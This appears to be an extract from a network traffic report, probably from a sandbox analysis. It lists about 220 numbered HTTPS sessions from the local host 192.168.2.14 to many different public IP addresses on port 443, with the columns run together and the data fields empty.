                                              11985192.168.2.1436962207.237.223.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11986192.168.2.145858892.45.120.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11987192.168.2.144876284.132.117.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11988192.168.2.1437344152.25.56.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11989192.168.2.145280895.83.39.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11990192.168.2.145608240.129.132.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11991192.168.2.1439620109.216.179.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11992192.168.2.145139290.116.10.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11993192.168.2.1459528131.214.186.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11994192.168.2.1444388159.89.129.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11995192.168.2.1450792185.21.66.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11996192.168.2.1436298102.218.232.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11997192.168.2.146007837.47.94.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11998192.168.2.145211848.141.28.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11999192.168.2.1445242223.226.177.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12000192.168.2.1457320129.27.191.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12001192.168.2.1449442188.130.87.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12002192.168.2.143965487.53.14.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12003192.168.2.143519839.95.118.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12004192.168.2.143910217.190.74.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12005192.168.2.144637223.215.199.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12006192.168.2.144006613.156.64.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12007192.168.2.1449826109.57.210.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12008192.168.2.1440168150.12.248.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12009192.168.2.145962695.191.253.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12010192.168.2.1460528203.140.194.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12011192.168.2.1442242116.63.242.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12012192.168.2.146009238.161.216.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12013192.168.2.145010886.125.147.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12014192.168.2.1448278209.97.246.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12015192.168.2.144491450.80.64.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12016192.168.2.1455120175.85.254.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12017192.168.2.1453596186.128.198.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12018192.168.2.1450782159.19.142.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12019192.168.2.145397251.248.96.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12020192.168.2.143713250.149.102.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12021192.168.2.1449148148.36.241.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12022192.168.2.1448914172.253.40.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12023192.168.2.144115427.111.251.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12024192.168.2.145363445.20.96.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12025192.168.2.145110273.95.28.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12026192.168.2.145277248.166.216.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12027192.168.2.144553260.230.109.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12028192.168.2.1460246179.220.69.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12029192.168.2.144002078.147.48.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12030192.168.2.1442076134.83.130.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12031192.168.2.1453120119.14.228.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12032192.168.2.1458316211.120.87.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12033192.168.2.1445240141.46.109.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12034192.168.2.1450066101.43.27.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12035192.168.2.145022818.63.241.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12036192.168.2.1444224174.163.126.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12037192.168.2.14434525.98.117.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12038192.168.2.1455918150.139.90.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12039192.168.2.1449114165.184.57.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12040192.168.2.1433130149.229.120.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12041192.168.2.1451908191.16.60.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12042192.168.2.1459300199.64.26.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12043192.168.2.1458486118.140.199.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12044192.168.2.1443178220.3.243.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12045192.168.2.1456800173.129.107.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12046192.168.2.145993470.4.83.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12047192.168.2.1456874184.220.214.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12048192.168.2.145880645.6.21.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12049192.168.2.1445802216.35.174.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12050192.168.2.1446500213.14.204.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12051192.168.2.1453052183.19.160.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12052192.168.2.1443464219.170.240.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12053192.168.2.145554414.250.189.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12054192.168.2.1446926148.163.19.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12055192.168.2.1436580184.231.186.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12056192.168.2.1441888177.63.133.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12057192.168.2.143532871.253.198.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12058192.168.2.145875223.79.169.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12059192.168.2.1435098182.16.62.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12060192.168.2.144980827.157.208.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12061192.168.2.145348251.77.129.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12062192.168.2.145350253.9.162.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12063192.168.2.14328625.84.32.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12064192.168.2.1438468169.56.51.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12065192.168.2.143634093.171.142.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12066192.168.2.143449444.48.16.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12067192.168.2.1433056153.55.177.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12068192.168.2.1459838219.147.169.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12069192.168.2.143816097.192.51.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12070192.168.2.1456244220.90.235.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12071192.168.2.1440700114.253.3.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12072192.168.2.1433120205.86.255.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12073192.168.2.1433646157.28.0.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12074192.168.2.143824077.44.207.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12075192.168.2.1455796211.120.181.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12076192.168.2.1439368132.197.190.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12077192.168.2.145729665.16.32.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12078192.168.2.1438298108.83.160.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12079192.168.2.1443858201.152.174.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12080192.168.2.1435112123.227.225.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12081192.168.2.1456434189.3.232.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12082192.168.2.1447520188.121.97.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12083192.168.2.1453074102.138.118.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12084192.168.2.1453026132.150.222.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12085192.168.2.1439928173.85.177.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12086192.168.2.1457744183.119.120.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12087192.168.2.145026652.233.31.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12088192.168.2.1454630169.91.42.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12089192.168.2.1458668147.37.98.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12090192.168.2.1439168102.78.247.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12091192.168.2.1453354186.3.71.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12092192.168.2.1458598111.235.230.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12093192.168.2.144397681.146.7.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12094192.168.2.144168036.140.7.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12095192.168.2.1445444187.250.226.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12096192.168.2.1449336162.235.219.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12097192.168.2.1451526156.191.174.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12098192.168.2.144867882.144.224.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12099192.168.2.1444336217.78.142.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12100192.168.2.1458474106.18.41.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12101192.168.2.14522905.11.30.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12102192.168.2.1457300134.143.84.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12103192.168.2.145772075.76.57.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12104192.168.2.143606644.108.96.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12105192.168.2.1442588194.247.202.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12106192.168.2.1454368166.216.223.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12107192.168.2.1436646192.197.44.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12108192.168.2.1440388207.79.55.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12109192.168.2.1436654208.227.132.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12110192.168.2.145884427.51.36.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12111192.168.2.1437172208.129.34.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12112192.168.2.1448624195.137.193.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12113192.168.2.1446104183.247.151.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12114192.168.2.1460722175.254.236.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12115192.168.2.145027450.46.85.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12116192.168.2.1449320143.50.249.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12117192.168.2.145884069.99.188.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12118192.168.2.1450008221.207.123.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12119192.168.2.143585019.242.208.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12120192.168.2.1450246160.96.134.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12121192.168.2.143533687.41.184.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12122192.168.2.1433730221.196.136.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12123192.168.2.1441944115.67.19.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12124192.168.2.145719454.120.58.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12125192.168.2.1457836132.60.190.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12126192.168.2.1448516169.61.56.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12127192.168.2.144876258.171.188.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12128192.168.2.1447370146.246.71.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12129192.168.2.1447948105.28.182.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12130192.168.2.1459738116.58.177.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12131192.168.2.1455242136.121.23.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12132192.168.2.145687099.149.224.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12133192.168.2.1439736106.115.127.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12134192.168.2.1450860102.121.148.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12135192.168.2.1452942169.168.107.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12136192.168.2.1459088203.247.169.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12137192.168.2.144123258.60.192.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12138192.168.2.1455534210.66.2.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12139192.168.2.144464070.17.79.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12140192.168.2.145882019.224.68.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12141192.168.2.1443256179.55.126.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12142192.168.2.143536453.28.1.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12143192.168.2.143555691.236.198.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12144192.168.2.143987820.37.75.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12145192.168.2.1443752160.19.3.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12146192.168.2.1454126212.75.96.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12147192.168.2.1444280145.216.156.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12148192.168.2.145140686.104.173.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12149192.168.2.1440972207.147.48.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12150192.168.2.1452128199.170.103.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12151192.168.2.1440470152.244.106.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12152192.168.2.1451048167.18.123.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12153192.168.2.1442458210.185.218.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12154192.168.2.145672085.191.126.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12155192.168.2.1440340134.6.100.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12156192.168.2.1436494199.111.245.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12157192.168.2.145713899.154.132.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12158192.168.2.14528329.117.144.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12159192.168.2.1460608190.106.4.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12160192.168.2.1452828119.9.69.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12161192.168.2.144082636.110.102.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12162192.168.2.145636431.8.193.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12163192.168.2.143849412.34.163.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12164192.168.2.1448728175.184.9.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12165192.168.2.145973224.24.86.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12166192.168.2.143426298.186.101.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12167192.168.2.144964823.8.26.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12168192.168.2.1460374148.121.32.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12169192.168.2.1441706151.113.169.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12170192.168.2.144914491.243.42.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12171192.168.2.1447432216.171.225.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12172192.168.2.1440320116.177.170.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12173192.168.2.1442464118.187.129.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12174192.168.2.143460657.114.181.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12175192.168.2.1444520201.251.12.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12176192.168.2.145290637.175.249.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12177192.168.2.144904413.56.193.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12178192.168.2.1460336147.129.177.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12179192.168.2.144864444.132.224.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12180192.168.2.145665067.23.150.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12181192.168.2.1439670135.36.223.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12182192.168.2.1444894155.66.188.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12183192.168.2.144916835.198.98.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12184192.168.2.145185224.239.131.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12185192.168.2.144762491.143.42.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12186192.168.2.1444798176.101.10.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12187192.168.2.1453824174.190.246.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12188192.168.2.1436966204.126.189.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12189192.168.2.1440344193.189.98.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12190192.168.2.1457592195.46.246.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12191192.168.2.1441074161.176.111.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12192192.168.2.144073017.106.163.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12193192.168.2.1460268160.27.22.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12194192.168.2.145924252.130.25.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12195192.168.2.1438526110.129.78.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12196192.168.2.1452796221.168.22.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12197192.168.2.1448350126.207.15.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12198192.168.2.1453654110.224.48.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12199192.168.2.143893680.40.224.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12200192.168.2.146058870.227.162.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12201192.168.2.1448584178.213.238.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12202192.168.2.1435488159.13.61.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12203192.168.2.143368079.96.10.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12204192.168.2.1448712169.198.178.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12205192.168.2.1441284114.145.20.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12206192.168.2.1452184193.26.221.85443
                                              TimestampBytes transferredDirectionData


